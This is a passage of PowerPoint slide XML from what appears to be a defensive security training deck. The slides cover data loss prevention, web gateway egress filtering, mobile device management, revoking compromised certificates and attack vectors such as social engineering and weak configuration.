                  <a:pt x="3364166" y="2073160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3412363" y="2086152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3460267" y="2099856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3507867" y="2114270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3555161" y="2129371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3602139" y="2145182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3648786" y="2161679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3695103" y="2178862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3741089" y="2196731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3786733" y="2215286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3832009" y="2234514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876941" y="2254427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921493" y="2275001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3965676" y="2296236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009479" y="2318143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052887" y="2340711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4095902" y="2363927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4138511" y="2387803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4180700" y="2412327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4222470" y="2437485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4263822" y="2463292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4304741" y="2489733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4345216" y="2516809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4385234" y="2544508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4424807" y="2572842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463910" y="2601798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4502543" y="2631363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4540694" y="2661551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578362" y="2692336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615535" y="2723743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4652213" y="2755747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4688370" y="2788348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4724019" y="2821546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4759147" y="2855341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4793742" y="2889720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4827803" y="2924683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4861318" y="2960217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4894288" y="2996336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4926685" y="3033026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4958524" y="3070288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4960594" y="3076625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4966043" y="3079889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4973739" y="3081083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4982527" y="3081248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4984597" y="3081083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4990046" y="3079889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4997742" y="3076625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5006530" y="3070288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5013312" y="3066529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5015573" y="305661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748778" y="5178628"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>02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730240" y="6065520"/>
            <a:ext cx="536575" cy="376555"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="536575" h="376554">
                <a:moveTo>
                  <a:pt x="536448" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="376427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536448" y="376427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536448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824854" y="6059804"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>01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576816" y="6153911"/>
            <a:ext cx="536575" cy="376555"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="536575" h="376554">
                <a:moveTo>
                  <a:pt x="536448" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="376427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536448" y="376427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536448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672573" y="6147561"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>03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88110" y="5329834"/>
            <a:ext cx="3781425" cy="1555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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="145" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Loss</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(DLP) </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-650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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>identifies </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>whether </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>DLP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>mechanisms </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>were </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="8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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>circumvented</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>not.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74038" y="1882292"/>
            <a:ext cx="13114019" cy="27679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22730" marR="5080" indent="-1510665">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Web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gateway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can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secured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egress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filtering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updating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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>URL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content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filtering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using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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>threat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data.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Following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various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ways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which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help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safeguarding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user’s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data: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050">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="410209">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="120" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Mobile</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Device</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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150" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Management</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75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185" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(MDM)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3767454" marR="4178300" indent="1270">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>helps </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>identifying </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>whether MDM </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="10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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>were</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>circumvented</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>not.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775060" y="5041163"/>
            <a:ext cx="4752340" cy="231965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396240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110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80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110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75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>revoke</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-70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50" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>certificates</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3010"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="16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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>removes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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0">
                <a:solidFill>
                  <a:srgbClr val="404040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3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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>trust</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>stores.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="119380" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>revokes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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0">
                <a:solidFill>
                  <a:srgbClr val="404040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2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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>re-</a:t>
            </a:r>
            <a:endParaRPr sz="22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  <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>certificate.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49671" y="306451"/>
            <a:ext cx="575437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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Endpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Changes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26764" y="760476"/>
            <a:ext cx="863193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91461" y="1882292"/>
            <a:ext cx="13074015" cy="14446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20945" marR="5080" indent="-5008880">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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reassess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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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surface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attack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vectors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mitigate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endpoint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breach,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following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vectors</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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considered:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="209550">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2460"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Social</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>engineering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77830" y="5203952"/>
            <a:ext cx="1764664" cy="69723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 indent="511809">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>confi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="110">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>urat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ion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29084" y="7085456"/>
            <a:ext cx="1807210" cy="69723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629920" marR="5080" indent="-617220">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Conf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100">
                <a:solidFill>
                  <a:srgbClr val="44484E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70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="165">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
